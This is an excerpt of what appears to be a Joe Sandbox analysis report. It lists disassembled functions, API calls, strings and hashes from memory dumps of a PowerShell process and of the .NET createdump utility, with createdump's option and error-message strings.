$]q, xrefs: 07880A62
$]q, xrefs: 07880A56
$]q, xrefs: 07880A3E
$]q, xrefs: 0788091D
4']q, xrefs: 07880953
$]q, xrefs: 078808EF
$]q, xrefs: 07880929
4']q, xrefs: 07880947

Memory Dump Source

Source File: 00000004.00000002.2234787415.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7880000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3118171705
Opcode ID: 341059c626cb39a214578bac31ac1d6789b3ad6d165750b33e78812381a40199
Instruction ID: b4a6c57144a2ea9e3560ddb88d7e682db7041fc8a06926c441159a8fd993e2cf
Opcode Fuzzy Hash: 341059c626cb39a214578bac31ac1d6789b3ad6d165750b33e78812381a40199
Instruction Fuzzy Hash: B2517DB570431ACFDB656E2A9C1067BBBF5EFE2220F14807BD885CB251DA35C849C761

Function 07880E88 Relevance: 6.3, Strings: 5, Instructions: 79COMMON

Download Yara Rule

Strings

$]q, xrefs: 07880F00
4Uk, xrefs: 07880F3E
$]q, xrefs: 07880ECB
4Uk, xrefs: 07880F30
$]q, xrefs: 07880F0C

Memory Dump Source

Source File: 00000004.00000002.2234787415.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7880000_powershell.jbxd

Similarity

API ID:
String ID: 4Uk$4Uk$$]q$$]q$$]q
API String ID: 0-381323310
Opcode ID: 8abfbdaa15185045c8b32916142fb6339fc85cde7c72ab73435c696136c87090
Instruction ID: bed91da6f14f27b587606fc11a752a4779f218908fc40f49be224c13c6baaaa4
Opcode Fuzzy Hash: 8abfbdaa15185045c8b32916142fb6339fc85cde7c72ab73435c696136c87090
Instruction Fuzzy Hash: 5D116AF131420A8BDB65692D985067F76DA8FE0652B14C43BD901CB2D2EF36C809C3B5

Function 0788163C Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

tP]q, xrefs: 078816D5
tP]q, xrefs: 078816E1
$]q, xrefs: 07881690
$]q, xrefs: 0788166A

Memory Dump Source

Source File: 00000004.00000002.2234787415.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7880000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q$$]q$$]q
API String ID: 0-1338969139
Opcode ID: d4ff58ceaa24ffb47be9095aacf0bf08c5d15593783cced43d242c20a3702934
Instruction ID: df28931e1ef5cf4dd6ac47d60fc3e309621a4c36531de10ec38c14e1237ebfa9
Opcode Fuzzy Hash: d4ff58ceaa24ffb47be9095aacf0bf08c5d15593783cced43d242c20a3702934
Instruction Fuzzy Hash: D8312CB2A083198FD754AE68A8446A5BBF4EFA1760B28455FD884CB251DE32DC02C791

Analysis Process: createdump.exePID: 1628, Parent PID: 3148COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.7%
Total number of Nodes:	700
Total number of Limit Nodes:	1

Executed Functions

Function 00007FF6FD011060 Relevance: 65.0, APIs: 13, Strings: 24, Instructions: 214
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6FD01112F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6FD01115B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6FD011187
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6FD011230
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF6FD01123C
GetTempPathA.KERNEL32 ref: 00007FF6FD0112C1
GetLastError.KERNEL32 ref: 00007FF6FD0112CB
GetLastError.KERNEL32 ref: 00007FF6FD0112DF
strcat_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6FD0112F8
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011350
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011359
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011364
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD01136D

Strings

minidump with heap, xrefs: 00007FF6FD01107C, 00007FF6FD0110BF
-, xrefs: 00007FF6FD01113C
-, xrefs: 00007FF6FD0111D7
-, xrefs: 00007FF6FD011110
createdump [options] pid-f, --name - dump path and file name. The default is '%TEMP%\dump.%p.dmp'. These specifiers are substituted with following values: %p PID of dumped process. %e The process executable filename. %h Hostname return by gethostn, xrefs: 00007FF6FD011386
minidump, xrefs: 00007FF6FD011267
full dump, xrefs: 00007FF6FD0111C3
-, xrefs: 00007FF6FD011168
dump.%p.dmp, xrefs: 00007FF6FD0112E9
GetTempPath failed (0x%08x), xrefs: 00007FF6FD0112D3
strcat_s failed (%d), xrefs: 00007FF6FD011306
Dump successfully written, xrefs: 00007FF6FD011338
--full, xrefs: 00007FF6FD0111A8
--normal, xrefs: 00007FF6FD011125
-, xrefs: 00007FF6FD011194
-, xrefs: 00007FF6FD0110DC
triage minidump, xrefs: 00007FF6FD011247
--diag, xrefs: 00007FF6FD0111EF
--name, xrefs: 00007FF6FD0110B8
v, xrefs: 00007FF6FD01121A
--triage, xrefs: 00007FF6FD01117D
--verbose, xrefs: 00007FF6FD011226
-, xrefs: 00007FF6FD011215
--withheap, xrefs: 00007FF6FD011151

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: strcmp$ErrorLast__acrt_iob_funcfflush$PathTempatoistrcat_s
String ID: -$-$-$-$-$-$-$--diag$--full$--name$--normal$--triage$--verbose$--withheap$Dump successfully written$GetTempPath failed (0x%08x)$createdump [options] pid-f, --name - dump path and file name. The default is '%TEMP%\dump.%p.dmp'. These specifiers are substituted with following values: %p PID of dumped process. %e The process executable filename. %h Hostname return by gethostn$dump.%p.dmp$full dump$minidump$minidump with heap$strcat_s failed (%d)$triage minidump$v
API String ID: 2647627392-2367407095
Opcode ID: 3e8843d71ddd811f5735ae345386871f6517bdd5673e2455e3aa9b185965a2cd
Instruction ID: d4418020894c8ee07418992ae44d15d17c1322c32ade87d47179ed1ab467eace
Opcode Fuzzy Hash: 3e8843d71ddd811f5735ae345386871f6517bdd5673e2455e3aa9b185965a2cd
Instruction Fuzzy Hash: 4CA15C62D0CB8255FB698F20E4402B976A4AF4675CF088135DAAEC66D9FE7CF454C382

Function 00007FF6FD0127EC Relevance: 13.6, APIs: 9, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF6FD012800

Part of subcall function 00007FF6FD012B8C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6FD012BAE

__scrt_release_startup_lock.LIBCMT ref: 00007FF6FD012883
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6FD0128D1
_get_initial_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6FD0128D6
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6FD0128DE
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6FD0128E6
__scrt_is_managed_app.LIBCMT ref: 00007FF6FD0128FA
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6FD012908
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6FD012962

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: __p___argc__p___argv__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
String ID:
API String ID: 2308368977-0
Opcode ID: 5a9b20bb9eaae0def914decdfc47a4fcc48693c8541f2657ef11ecffac799aa6
Instruction ID: 1b34762205fc4441c3e027b614fcf3bd282b4c0a0ff6936a38b7832945cc0718
Opcode Fuzzy Hash: 5a9b20bb9eaae0def914decdfc47a4fcc48693c8541f2657ef11ecffac799aa6
Instruction Fuzzy Hash: 18312621E0D24382FB14BF74A4523BD6291AF4178CF445039EA6ECB2E7FE6CB84582D4

Function 00007FF6FD011450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011475
fprintf.MSPDB140-MSVCRT ref: 00007FF6FD011485

Part of subcall function 00007FF6FD011010: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011047

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011494
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0114B3
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0114BE
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0114C7

Strings

[createdump] , xrefs: 00007FF6FD01147E

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: __acrt_iob_func$__stdio_common_vfprintf$fflushfprintf
String ID: [createdump]
API String ID: 3735572767-2657508301
Opcode ID: f7b41b5d75985a22341ebafe60962d777547180dfe076665e84a48d8af4ee52e
Instruction ID: e2b48ca4bf7cffbe22ea4cf806e53abdec780d5d3796798182fc5b25a4e827cb
Opcode Fuzzy Hash: f7b41b5d75985a22341ebafe60962d777547180dfe076665e84a48d8af4ee52e
Instruction Fuzzy Hash: 87016D72A08B8292E7019F50F80566AA364FF84BD9F004539EE9D837A5FF7CE555C780

Non-executed Functions

Function 00007FF6FD012ECC Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6FD012EE8
RtlCaptureContext.KERNEL32 ref: 00007FF6FD012F15
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6FD012F2F
RtlVirtualUnwind.KERNEL32 ref: 00007FF6FD012F70
IsDebuggerPresent.KERNEL32 ref: 00007FF6FD012FC4
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6FD012FE5
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6FD012FF0

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 92083fc3b2590fb7f42fdf2bff26a09e0be32edceb9cda99800bf26d983c5eac
Instruction ID: e843ef4bdb5e0adfec5ebf089058136669aeea6533846b15d4dc79426b916a09
Opcode Fuzzy Hash: 92083fc3b2590fb7f42fdf2bff26a09e0be32edceb9cda99800bf26d983c5eac
Instruction Fuzzy Hash: 22314F72608A8696EB609F60E8407ED7365FB44748F444439DA5E87AD4FF38E648C750

Function 00007FF6FD013074 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c8a5ce5a61a9accbe9d72245b7862f6c7c599a8b634bc8698eb0ff17e984138
Instruction ID: ede90b34ae98c0cbcb76204bbee68bd1dec136a141a1ce24c648ce4ac187b061
Opcode Fuzzy Hash: 8c8a5ce5a61a9accbe9d72245b7862f6c7c599a8b634bc8698eb0ff17e984138
Instruction Fuzzy Hash: AAA0012190C807E0E7869F90A8646292260AB50308B400531D02D810E1BE3CB6448380

Function 00007FF6FD0123C0 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6FD01242D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6FD01243B

Part of subcall function 00007FF6FD011450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011475
Part of subcall function 00007FF6FD011450: fprintf.MSPDB140-MSVCRT ref: 00007FF6FD011485
Part of subcall function 00007FF6FD011450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011494
Part of subcall function 00007FF6FD011450: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0114B3
Part of subcall function 00007FF6FD011450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0114BE
Part of subcall function 00007FF6FD011450: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0114C7

K32GetModuleBaseNameA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6FD012466
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6FD012470
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6FD012487
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6FD0125F3

Strings

Writing %s to file %s, xrefs: 00007FF6FD0124C3
Invalid process id '%d' error %d, xrefs: 00007FF6FD012447
Get process name FAILED %d, xrefs: 00007FF6FD012478
Write dump FAILED 0x%08x, xrefs: 00007FF6FD01258E
Invalid dump path '%s' error %d, xrefs: 00007FF6FD01252C

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: __acrt_iob_func$ErrorLast$BaseCloseHandleModuleNameOpenProcess__stdio_common_vfprintf_invalid_parameter_noinfo_noreturnfflushfprintf
String ID: Get process name FAILED %d$Invalid dump path '%s' error %d$Invalid process id '%d' error %d$Write dump FAILED 0x%08x$Writing %s to file %s
API String ID: 3971781330-1292085346
Opcode ID: 8ec448eeb6e8f02312a1538d84a3c8dfc991fc7cafdc13e8cd0ded943aea62a7
Instruction ID: 9343af4c7fe993c27f4e36121b2fb8a9e495cf004a9b48ade692516a5ab034b9
Opcode Fuzzy Hash: 8ec448eeb6e8f02312a1538d84a3c8dfc991fc7cafdc13e8cd0ded943aea62a7
Instruction Fuzzy Hash: C7616031A08A4282EB50DF25E455A6E7762FB85798F500134EAAE83AE5FF3CF545C780

Function 00007FF6FD0149A4 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 316
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6FD014B42
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6FD014E65
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6FD014E7B
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6FD014E93
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6FD014E99

Strings

csm, xrefs: 00007FF6FD014B69
csm, xrefs: 00007FF6FD014AEB
csm, xrefs: 00007FF6FD014A89

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: terminate$Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 695522112-393685449
Opcode ID: b33eca4017884e99d2f222704934a1d2e619e74398d1b95ed41b8d3f9756be10
Instruction ID: 1bd64374d09d5f1ea3019f4a0a03fdb35138296776ee413d5d1375e3c13d77c1
Opcode Fuzzy Hash: b33eca4017884e99d2f222704934a1d2e619e74398d1b95ed41b8d3f9756be10
Instruction Fuzzy Hash: 60E18E729086868AEB20DF65D4803AD77A0FB44B9CF144135DAAD876E6FF38F585C780

Function 00007FF6FD0113C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0113E5
fprintf.MSPDB140-MSVCRT ref: 00007FF6FD0113F5

Part of subcall function 00007FF6FD011010: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011047

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011404
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011423
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD01142E
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011437

Strings

[createdump] , xrefs: 00007FF6FD0113EE

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: __acrt_iob_func$__stdio_common_vfprintf$fflushfprintf
String ID: [createdump]
API String ID: 3735572767-2657508301
Opcode ID: 5b675bc39e039bc525fd467c26ca74d7b5bd1981a0b88a155956b168aee24ed4
Instruction ID: c47802bc2a8c75d26511a4f23dfc4b61dbdbeafd656e658001c5226ecfb5d9fe
Opcode Fuzzy Hash: 5b675bc39e039bc525fd467c26ca74d7b5bd1981a0b88a155956b168aee24ed4
Instruction Fuzzy Hash: C2014F71A08B4192E7019F50F8145AAA360EB84BD9F004135EE9D437A5FFBCE595C780

Function 00007FF6FD011800 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 92
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 00007FF6FD01186C

Part of subcall function 00007FF6FD011450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011475
Part of subcall function 00007FF6FD011450: fprintf.MSPDB140-MSVCRT ref: 00007FF6FD011485
Part of subcall function 00007FF6FD011450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD011494
Part of subcall function 00007FF6FD011450: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0114B3
Part of subcall function 00007FF6FD011450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0114BE
Part of subcall function 00007FF6FD011450: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6FD0114C7

Strings

Pipe syntax in dump name not supported, xrefs: 00007FF6FD011850
Invalid dump name format char '%c', xrefs: 00007FF6FD011DD0
--name, xrefs: 00007FF6FD01180A
%%%%%%%%, xrefs: 00007FF6FD011D5C
%%%%%%%%, xrefs: 00007FF6FD011890

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: __acrt_iob_func$Startup__stdio_common_vfprintffflushfprintf
String ID: %%%%%%%%$%%%%%%%%$--name$Invalid dump name format char '%c'$Pipe syntax in dump name not supported
API String ID: 3378602911-3973674938
Opcode ID: 6d691e12a95190b73438bc01f861d361a60469c0dc3d28550e2b0afd423a51ff
Instruction ID: 4cd2013180f03f0b9c8ad7d1817230c43c73b7284d16694adaa61e1d744e3714
Opcode Fuzzy Hash: 6d691e12a95190b73438bc01f861d361a60469c0dc3d28550e2b0afd423a51ff
Instruction Fuzzy Hash: B931CD63E08A8186E7598F55A8557F927A2FB4578CF844036EEAD832D1FE3CF145C381

Function 00007FF6FD016498 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,?,00000000,00007FF6FD01669F,?,?,?,00007FF6FD01441E,?,?,?,00007FF6FD0143D9), ref: 00007FF6FD01651D
GetLastError.KERNEL32(?,00000000,00007FF6FD01669F,?,?,?,00007FF6FD01441E,?,?,?,00007FF6FD0143D9,?,?,?,?,00007FF6FD013524), ref: 00007FF6FD01652B
LoadLibraryExW.KERNEL32(?,00000000,00007FF6FD01669F,?,?,?,00007FF6FD01441E,?,?,?,00007FF6FD0143D9,?,?,?,?,00007FF6FD013524), ref: 00007FF6FD016555
FreeLibrary.KERNEL32(?,00000000,00007FF6FD01669F,?,?,?,00007FF6FD01441E,?,?,?,00007FF6FD0143D9,?,?,?,?,00007FF6FD013524), ref: 00007FF6FD01659B
GetProcAddress.KERNEL32(?,00000000,00007FF6FD01669F,?,?,?,00007FF6FD01441E,?,?,?,00007FF6FD0143D9,?,?,?,?,00007FF6FD013524), ref: 00007FF6FD0165A7

Strings

api-ms-, xrefs: 00007FF6FD01653D

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 91eaabdab86b5d7484fb536d38c8d26551698fbc6984510a5f5d6d43d06b7795
Instruction ID: 778e83fda49f26605553ae6c6367572d96701c8f6593fbff03df9c88cc633c6e
Opcode Fuzzy Hash: 91eaabdab86b5d7484fb536d38c8d26551698fbc6984510a5f5d6d43d06b7795
Instruction Fuzzy Hash: 6A315021A1A64291EF129F169C005792298BF48BA8F994635FD2D877D9FF3CF4448380

Function 00007FF6FD011B18 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF6FD011B1D

Strings

Could not get the host name for dump name: %d, xrefs: 00007FF6FD011DB2
%%%%%%%%, xrefs: 00007FF6FD011D5C

Memory Dump Source

Source File: 00000008.00000002.2289521178.00007FF6FD011000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6FD010000, based on PE: true

Associated: 00000008.00000002.2289480336.00007FF6FD010000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289685423.00007FF6FD01C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2289757629.00007FF6FD01D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6fd010000_createdump.jbxd

Similarity

API ID: _time64
String ID: %%%%%%%%$Could not get the host name for dump name: %d
API String ID: 1670930206-4114407318
Opcode ID: 30f253d6cb86930f70187238c9af70fef4a32202514a54efb800f102df6d23dc
Instruction ID: 41b7e9828a4023f1a4e5c54ba2e2c56e77b6bf3c2fce6f77afb42b90d77038c8
Opcode Fuzzy Hash: 30f253d6cb86930f70187238c9af70fef4a32202514a54efb800f102df6d23dc
Instruction Fuzzy Hash: D251C362A18B8186EB04CF28E4947AD67A5FB457D8F400135EA6D57BE9FF3CE041D780

Function 00007FF6FD014EA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EncodePointer.KERNEL32 ref: 00007FF6FD014F10
